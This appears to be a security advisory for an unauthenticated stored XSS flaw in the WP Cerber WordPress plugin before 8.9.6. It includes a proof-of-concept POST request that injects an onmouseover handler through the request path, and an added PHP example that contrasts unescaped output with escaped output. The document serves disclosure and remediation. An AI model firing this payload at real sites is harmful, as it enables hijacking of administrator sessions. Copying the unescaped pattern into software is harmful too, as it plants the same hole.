wpvulndb | Krzysztof Zając | WPVDB-ID: D1B6F438-F737-4B18-89CF-161238A7421B
History: Feb 14, 2022 - 12:00 a.m.

WP Cerber Security, Anti-spam & Malware Scan < 8.9.6 - Unauthenticated Stored Cross-Site Scripting

2022-02-14 00:00:00
Krzysztof Zając
wpscan.com

EPSS: 0.001 (Low), Percentile: 44.4%

The plugin does not sanitise the $url variable before using it in an HTML attribute in the Activity tab of the plugin's dashboard, leading to an unauthenticated stored Cross-Site Scripting vulnerability.

PoC

POST /"/onmouseover=alert(1);// HTTP/1.1
Host: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 100

a[b][c][d][e][f][g][h][i][j][k][l][m][n][o][p][q][r][s][t][u][v][w][x][y][z][1][2][3][4][5][6]=12345

Then the admin needs to browse to http://127.0.0.1:8001/wp-admin/admin.php?page=cerber-security&tab=activity and move the mouse over the link.
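As an added illustration that is not part of the advisory or of the plugin's own code, the vulnerable pattern described above beside a hardened form, in plain PHP. It assumes the plugin records the raw request URI and later builds the Activity link by string concatenation; the function names and the inline esc_attr()/esc_html() fallbacks are assumptions so the file runs outside WordPress.

```php
<?php
// Added illustration, not WP Cerber's code. Assumption: the plugin stores the
// raw request URI of each logged event and later renders it as a link.

// Fallbacks so the file runs under plain `php` outside WordPress; inside
// WordPress the real esc_attr()/esc_html() apply (equivalent for & < > " ').
if ( ! function_exists( 'esc_attr' ) ) {
    function esc_attr( $text ) {
        return htmlspecialchars( (string) $text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8' );
    }
}
if ( ! function_exists( 'esc_html' ) ) {
    function esc_html( $text ) {
        return htmlspecialchars( (string) $text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8' );
    }
}

// Vulnerable pattern (hypothetical reconstruction of the bug): the stored value
// is dropped into a quoted attribute unescaped, so a " inside the path closes
// href and the remainder of the value is parsed as a new attribute.
function activity_link_unsafe( $url ) {
    return '<a href="' . $url . '">' . $url . '</a>';
}

// Hardened pattern: escape for the exact context the value lands in.
// esc_attr() entity-encodes & < > " ' so the attribute boundary cannot be
// broken; esc_html() protects the text node the same way.
function activity_link_safe( $url ) {
    return '<a href="' . esc_attr( $url ) . '">' . esc_html( $url ) . '</a>';
}

// Constructed sample: the request path from the advisory's PoC, as the plugin
// would have recorded it.
$url = '/"/onmouseover=alert(1);//';

echo activity_link_unsafe( $url ), "\n"; // attribute breakout: the handler is live
echo activity_link_safe( $url ), "\n";   // quote is encoded: value stays inside href
```

The same rule applies to any logged request data (User-Agent, referrer, query string): escape at output time for the attribute, text or JavaScript context it is written into, not once at storage time.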

CPE Name  | Operator | Version
wp-cerber | lt       | 8.9.6

